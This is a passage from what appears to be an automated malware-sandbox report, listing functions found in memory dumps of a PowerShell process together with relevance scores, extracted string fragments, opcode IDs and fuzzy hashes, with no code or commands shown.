                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$D<+$D<+$d=+$h%f$h%f$$p$$p$$p
                                                                        • API String ID: 0-1980983107
                                                                        • Opcode ID: feb03b57519fa112fdd49b356c6bfd3bf4bae5515924c3fb090a1caed45214f5
                                                                        • Instruction ID: 7645bbc7aafba05a83379b0b9284f2f1001917afa73be5245e40e20dc50857a3
                                                                        • Opcode Fuzzy Hash: feb03b57519fa112fdd49b356c6bfd3bf4bae5515924c3fb090a1caed45214f5
                                                                        • Instruction Fuzzy Hash: C1A1F430B043019FDB299A78941077BBBB2AFC5310F24847BC545EB2D2DA79DD52C7A6
                                                                        Function 00404F8C Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$tPp
                                                                        • API String ID: 0-2826180314
                                                                        • Opcode ID: ee6dde35328a3dc6a208cbf772221942dbc299fd801398d54430e39a61ab4ded
                                                                        • Instruction ID: 88648aa0e2bea7dcea43664dfd780cc2036dec350c53624c6680fc637557f223
                                                                        • Opcode Fuzzy Hash: ee6dde35328a3dc6a208cbf772221942dbc299fd801398d54430e39a61ab4ded
                                                                        • Instruction Fuzzy Hash: 77318E35A00A049BDB24CA19C441B6BB7E6EF88311F19C0B7D605AB395DB7ADC41CFD9
                                                                        Function 0040123A Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPp
                                                                        • API String ID: 0-1477601333
                                                                        • Opcode ID: 79b34aeb9feb25f320024d6f8fd86be4f097d0c1ca9ef57ae8f6e054d1b9ed3f
                                                                        • Instruction ID: 8b8c3b07bfdba2d9888b50f42ddaf9ed71dd07d7bfe096427e82e6033f550145
                                                                        • Opcode Fuzzy Hash: 79b34aeb9feb25f320024d6f8fd86be4f097d0c1ca9ef57ae8f6e054d1b9ed3f
                                                                        • Instruction Fuzzy Hash: 93419630A093808FC7128B648854A6AFFB1AF87314F1980EFD994AF2E7C6759C45C756
                                                                        Function 00406014 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p
                                                                        • API String ID: 0-481844870
                                                                        • Opcode ID: e4738d95e43b6cb6adfd84b58ac4b0658d483fffa89737a4de70a025e800cc02
                                                                        • Instruction ID: 314118bd36c7b7c90e6cc0ed79b54ed08088bf413dd86815e6bc248a5061c5dc
                                                                        • Opcode Fuzzy Hash: e4738d95e43b6cb6adfd84b58ac4b0658d483fffa89737a4de70a025e800cc02
                                                                        • Instruction Fuzzy Hash: 89219F30A00205CFCB24DF69C54066BB7E1AB94350F16807BD00AAB392D738CDA1CBA5
                                                                        Function 00233380 Relevance: .5, Instructions: 548COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 829b448cfe8f6a0ddc9856bc5db1a20a51aa584793a904f61eb06799a895a5c3
                                                                        • Instruction ID: b4ec72e64486876db70d837cba13c7d15845a8b6db4b697d3d3182f1b7d989bf
                                                                        • Opcode Fuzzy Hash: 829b448cfe8f6a0ddc9856bc5db1a20a51aa584793a904f61eb06799a895a5c3
                                                                        • Instruction Fuzzy Hash: 15323BB4A10219AFDB15CFA8D494A9DFBF2BF88310F24C559E844AB355C770EE85CB90
                                                                        Function 00233599 Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45f3fdffb76c7032bd952dffe87f5a4a2dfc07ed9a21a624b4cc6190cdeec14d
                                                                        • Instruction ID: cf5d8f9c4e97e22216cd1d2af7992339ba564162b47e452c182fbc1b55f00b31
                                                                        • Opcode Fuzzy Hash: 45f3fdffb76c7032bd952dffe87f5a4a2dfc07ed9a21a624b4cc6190cdeec14d
                                                                        • Instruction Fuzzy Hash: 0D512C74A10209AFCB04CFA8D495AADFBF6BF88314F64C559E804AB355C735EE86CB50
                                                                        Function 00403196 Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e001c849404bce072ec7949aa74160153ae647d0e4d649dce6a038d57bc2de9c
                                                                        • Instruction ID: 38472f396053164d4d5706aae90fd2cad3bd9b968974b46cc85f28afbb35e827
                                                                        • Opcode Fuzzy Hash: e001c849404bce072ec7949aa74160153ae647d0e4d649dce6a038d57bc2de9c
                                                                        • Instruction Fuzzy Hash: 89419670A04200CFCB248F658581A6B7FBAAB85752B1880BBDD05AF3D5DB39DE41C759
                                                                        Function 00403DF8 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d91675d91042d177864f8d7f249a60c3a2d3b937f276c1d354d9e93bccd1dc0e
                                                                        • Instruction ID: da1828099516e53544d4aa6a50880962bde150350cefe2792937e76bdece6fdc
                                                                        • Opcode Fuzzy Hash: d91675d91042d177864f8d7f249a60c3a2d3b937f276c1d354d9e93bccd1dc0e
                                                                        • Instruction Fuzzy Hash: 84217430B00205CFCB24DF54C544A6ABFBAAB88712F14827BD908AB395D739DE45CB99
                                                                        Function 004015F1 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a3bc3f235aa2a3f97458a173c226a9a34cf27bce7c75258080bc2769e93eeef
                                                                        • Instruction ID: 067eb4fde3ac5b179fa247f08c6a2f2a14a6eda5d443df59cad81c7040b14947
                                                                        • Opcode Fuzzy Hash: 7a3bc3f235aa2a3f97458a173c226a9a34cf27bce7c75258080bc2769e93eeef
                                                                        • Instruction Fuzzy Hash: A71108B07483846FD72557748C65BAE6FB6DF96300F1844ABE582DF2D7D8698C0A8322
                                                                        Function 002336AA Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 496b2c290a24602ae1f556a6c42f11c3648d564ca23c50f72d9b12e0d4a99d06
                                                                        • Instruction ID: 5542856b76586a28bae9a48468a505f1b99d3dca8b12926a7ce76c1c88fd2cc6
                                                                        • Opcode Fuzzy Hash: 496b2c290a24602ae1f556a6c42f11c3648d564ca23c50f72d9b12e0d4a99d06
                                                                        • Instruction Fuzzy Hash: 281104B4A10209AFDB05CFA8D485B9DBBF6AF88314F24C459E404AB361C775EE86CB54
                                                                        Function 0015D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.470973341.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 724f6b67d93bcdb683f0a52258f318a604795ee684f1af0c1885efb679c41a07
                                                                        • Instruction ID: d68f4f22afd18a02c43e8bac4b475ef0b7c9c87cfe989fef745f97c85dbe689d
                                                                        • Opcode Fuzzy Hash: 724f6b67d93bcdb683f0a52258f318a604795ee684f1af0c1885efb679c41a07
                                                                        • Instruction Fuzzy Hash: 69018471504340EAE7254E15D884B66BF98DF41725F28841AFC554E2C6C7799849C7B1
                                                                        Function 0015D006 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.470973341.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbff83bfc4066dc28dfcf422e90692959c9715e923fe4181125c05d526be179b
                                                                        • Instruction ID: c44852a07059b69472040e39f3083440e0556687a70b776dbed26ba32108f895
                                                                        • Opcode Fuzzy Hash: bbff83bfc4066dc28dfcf422e90692959c9715e923fe4181125c05d526be179b
                                                                        • Instruction Fuzzy Hash: D401526140D3C09FD7124B259C94B62BFB4DF53225F1980DBE8848F2D7C2699848C772
                                                                        Function 00401618 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38773428ff7fcfbc1edf055f3eaa947a725de2272233bb9381eef21655674a02
                                                                        • Instruction ID: 4cf7ff13596293a7ab48095ab639a623c0e75b907391970076e89d071d2821b0
                                                                        • Opcode Fuzzy Hash: 38773428ff7fcfbc1edf055f3eaa947a725de2272233bb9381eef21655674a02
                                                                        • Instruction Fuzzy Hash: EBF0227074030867DA24A6758816BAF68BBDFC8700F548429F906AF3C5DDB2DC048366
                                                                        Function 004015C5 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e202cb6b642db88e7b4f1004e581b47d029330acfdff2bb6b22b7986edd3ab3c
                                                                        • Instruction ID: 46403adb0b3aea9f502119ee8c2e6b24e0681737db40aa0978975d06aac33c9c
                                                                        • Opcode Fuzzy Hash: e202cb6b642db88e7b4f1004e581b47d029330acfdff2bb6b22b7986edd3ab3c
                                                                        • Instruction Fuzzy Hash: 6BE0EC367010159BD744CA89D8919AAF375FFC8228B24C1AAD919CB292CB33ED17CB90

                                                                        Non-executed Functions

                                                                        Function 004000A0 Relevance: 21.7, Strings: 17, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (:+$(:+$(:+$4'p$4'p$H;+$L4p$L4p$L4p$L4p$L4p$L4p$L:+$L:+$L:+$$p$$p
                                                                        • API String ID: 0-2406725063
                                                                        • Opcode ID: 1d421a294e9b39e2f0d24511831b6aa3feba52be4c8c544464f4c20531a30f87
                                                                        • Instruction ID: c80fa4a889b80b763add2679f080311b3164d477bb4a96f0291ef6de7b501e98
                                                                        • Opcode Fuzzy Hash: 1d421a294e9b39e2f0d24511831b6aa3feba52be4c8c544464f4c20531a30f87
                                                                        • Instruction Fuzzy Hash: 37E1E531704204EFCB259A68D850BAF7BA2AFC5310F18847BE945AB3D5CB79CD41CB96
                                                                        Function 004005C8 Relevance: 14.0, Strings: 11, Instructions: 235COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (Fc$(Fc$(Fc$4'p$4'p$L4p$L4p$L4p$l;+$l;+$l;+
                                                                        • API String ID: 0-506421187
                                                                        • Opcode ID: 7067728f458a608f75cd4f97290846ae62169421a34ebba95eb831b9553bdc8f
                                                                        • Instruction ID: b16791d6fad0a2612532c146f4b96d36edcca65d9871b78887d082bebe117e96
                                                                        • Opcode Fuzzy Hash: 7067728f458a608f75cd4f97290846ae62169421a34ebba95eb831b9553bdc8f
                                                                        • Instruction Fuzzy Hash: 208127317003449FCB259A68C8507AF7BA2AFC4310F18847BE951AB3D6CB79DD51CB96
                                                                        Function 004012B0 Relevance: 9.0, Strings: 7, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `\f$`\f$tPp$tPp$tPp$tPp$$p
                                                                        • API String ID: 0-851305547
                                                                        • Opcode ID: 3a5147a2fc6f9a9b4d174d1de1b23bd5568b6a150933730b4d1dffdd1ebed389
                                                                        • Instruction ID: 92fdc72d2a772aaa7820efa23ab4aa02937674f02e5be7b0e4812f7b9c0f4e5f
                                                                        • Opcode Fuzzy Hash: 3a5147a2fc6f9a9b4d174d1de1b23bd5568b6a150933730b4d1dffdd1ebed389
                                                                        • Instruction Fuzzy Hash: EB71C031B043109FD7249B688851B6ABFA2AFC5710F68847BE945EF3E2CA75DC01C7A5
                                                                        Function 00405908 Relevance: 6.4, Strings: 5, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h%f$h%f$$p$$p$$p
                                                                        • API String ID: 0-930881452
                                                                        • Opcode ID: f1295682828166ef753ed59c30b3bd33e6f8095af91c7ff398a2da6f4514f9e7
                                                                        • Instruction ID: e4e48b1ddcf36d84d20c8349d848df24b1bc660df6c8e363bc7872ef462b93ea
                                                                        • Opcode Fuzzy Hash: f1295682828166ef753ed59c30b3bd33e6f8095af91c7ff398a2da6f4514f9e7
                                                                        • Instruction Fuzzy Hash: 1041F375704701CFCB158A6D980066BBBE1EFD6321B28847BC485DB391DA39CD46CFA6
                                                                        Function 00401E38 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8#f$8#f$$p$$p$$p
                                                                        • API String ID: 0-2615686744
                                                                        • Opcode ID: 8ffff1df1fda9c601e6e076fcb110023a6452f2c4925c670eab587c52809842f
                                                                        • Instruction ID: 0341b852d311cdf12b9f275967eb99c6b07a893e716db2a4f9d02e9bb4634a17
                                                                        • Opcode Fuzzy Hash: 8ffff1df1fda9c601e6e076fcb110023a6452f2c4925c670eab587c52809842f
                                                                        • Instruction Fuzzy Hash: CA31F032B002168BCB249A69D8015BFFBA2AFD4310B24853BDD59EB391EF35DD02C795
                                                                        Function 004008BF Relevance: 6.3, Strings: 5, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $;+$(Fc$(Fc$$p$$p
                                                                        • API String ID: 0-1585566925
                                                                        • Opcode ID: cf8e26d08a0c45ae23aedbd8acf974adf646008ce00f0a7bebfad09ba2c7a82c
                                                                        • Instruction ID: 0a0002165f1f64d5420d86346c9d0fc563e981e1edaf15cc1f3062b189048711
                                                                        • Opcode Fuzzy Hash: cf8e26d08a0c45ae23aedbd8acf974adf646008ce00f0a7bebfad09ba2c7a82c
                                                                        • Instruction Fuzzy Hash: 3301F7B2A0E3C45FD732872C481039ABFA16FD6700F6941A7C4D19B29BC9389C06CB67
                                                                        Function 0040647D Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `\f$h%f$h%f$[f
                                                                        • API String ID: 0-3778661936
                                                                        • Opcode ID: ccf04bd44d3b9ce96a252668ecd6b3b7720ff18441a25ea79a758f306347b077
                                                                        • Instruction ID: ab050d33797f883cac30072f26054d71a8993cdd9ec7009f52dca0e87184c833
                                                                        • Opcode Fuzzy Hash: ccf04bd44d3b9ce96a252668ecd6b3b7720ff18441a25ea79a758f306347b077
                                                                        • Instruction Fuzzy Hash: 5EC16B74A00204DFDB24DF58D544EAABBF2EF88314F25C06AE806AB395C732EC56CB55
                                                                        Function 00406A70 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `\f$h%f$h%f$[f
                                                                        • API String ID: 0-3778661936
                                                                        • Opcode ID: 436e89dc18e419eb00a1c664834132d81af3c8b1c3c5a9a4929dd63fc013c24b
                                                                        • Instruction ID: 44c5a54f1b9cecb399f8f9fe265b7231c863674e6911637d06d78d94a6ee7403
                                                                        • Opcode Fuzzy Hash: 436e89dc18e419eb00a1c664834132d81af3c8b1c3c5a9a4929dd63fc013c24b
                                                                        • Instruction Fuzzy Hash: 2BC13C74A00204DFDB14DF58D544EAABBF2EF88314F25C06AE806AB395CB76EC52CB55
                                                                        Function 00406488 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `\f$h%f$h%f$[f
                                                                        • API String ID: 0-3778661936
                                                                        • Opcode ID: 6ad2271701bc393e3327b6549f99c6c1cc9a05969390598d0e0e06d85c80a4d3
                                                                        • Instruction ID: e21943518ce1fe79d42ff536d0c9805d291b4028d8847dc4392bf8ddc8bfeae7
                                                                        • Opcode Fuzzy Hash: 6ad2271701bc393e3327b6549f99c6c1cc9a05969390598d0e0e06d85c80a4d3
                                                                        • Instruction Fuzzy Hash: 53C15B74A00204DFDB24DF58D544EAABBF2EF88314F25C06AE806AB395C736EC56CB55
                                                                        Function 004013A8 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPp$$p$$p$$p
                                                                        • API String ID: 0-561023840
                                                                        • Opcode ID: c6fba9a98ad148ba1144e26eccd113d0b1b30c314fad60b46fb67d4fe7b623c5
                                                                        • Instruction ID: 433ffafdd210cde3e5fb9486efe9d1cb7bc1b79aa49ecd61e6613a9cb66967be
                                                                        • Opcode Fuzzy Hash: c6fba9a98ad148ba1144e26eccd113d0b1b30c314fad60b46fb67d4fe7b623c5
                                                                        • Instruction Fuzzy Hash: 3031C1327042118FE7248A69E400A6AFBE6EBD4720B64807FE945EB3B1CA76DC41C755
                                                                        Function 00404890 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $p$$p$$p$$p
                                                                        • API String ID: 0-3121760203
                                                                        • Opcode ID: 7d76d4523efb21725d00aa1da719d10ffeccb36291baecc5cca7fc2456d8156e
                                                                        • Instruction ID: f65e273c38f3e7eb8fd4b7601831d36a7feabb0ad90345d64a9d9412e592ac01
                                                                        • Opcode Fuzzy Hash: 7d76d4523efb21725d00aa1da719d10ffeccb36291baecc5cca7fc2456d8156e
                                                                        • Instruction Fuzzy Hash: 932105BA7003115BD73469799801B3BAAA69BC4310F34843BE645E73C5DEB9CC42C365
                                                                        Function 0040094B Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <+$$p$$p$$p
                                                                        • API String ID: 0-4198443744
                                                                        • Opcode ID: 9935e3985b5ce88e9eebcdf6c512e1033547d05c47417c58f4ff762e2b16d95c
                                                                        • Instruction ID: be817370d2938de6a8068facc64af3bbd15d37fd4a6b84cea76a734a68706b03
                                                                        • Opcode Fuzzy Hash: 9935e3985b5ce88e9eebcdf6c512e1033547d05c47417c58f4ff762e2b16d95c
                                                                        • Instruction Fuzzy Hash: FC112472B043944FD326565CA41139FAFA26FE1710F79487BD0819B29ADD349C42C3A7